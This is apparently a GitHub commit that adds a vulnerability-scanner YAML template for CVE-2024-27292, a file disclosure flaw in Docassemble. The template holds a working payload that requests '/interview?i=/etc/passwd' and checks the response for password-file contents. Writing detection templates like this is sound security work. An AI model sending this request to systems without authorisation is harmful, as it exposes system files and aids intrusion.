Create CVE-2024-27292.yaml

patch-4
johnk3r 2024-07-01 12:24:38 -03:00 committed by GitHub
parent 425160439c
commit b8f580fb67
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 28 additions and 0 deletions

View File

@ -0,0 +1,28 @@
id: CVE-2024-27292
info:
name: Sensitive File Disclosure via Interview Endpoint
author: johnk3r
severity: high
description: Docassemble is an expert system for guided interviews and document assembly. The vulnerability allows attackers to gain unauthorized access to information on the system through URL manipulation. It affects versions 1.4.53 to 1.4.96. The vulnerability has been patched in version 1.4.97 of the master branch.
reference:
- https://tantosec.com/blog/docassemble/
- https://github.com/jhpyle/docassemble/security/advisories/GHSA-jq57-3w7p-vwvv
tags: lfi,docassemble,cve,cve2024
requests:
- method: GET
path:
- "{{BaseURL}}/interview?i=/etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "nobody:[x*]:65534:65534"
- "root:.*:0:0:"
condition: or
- type: status
status:
- 501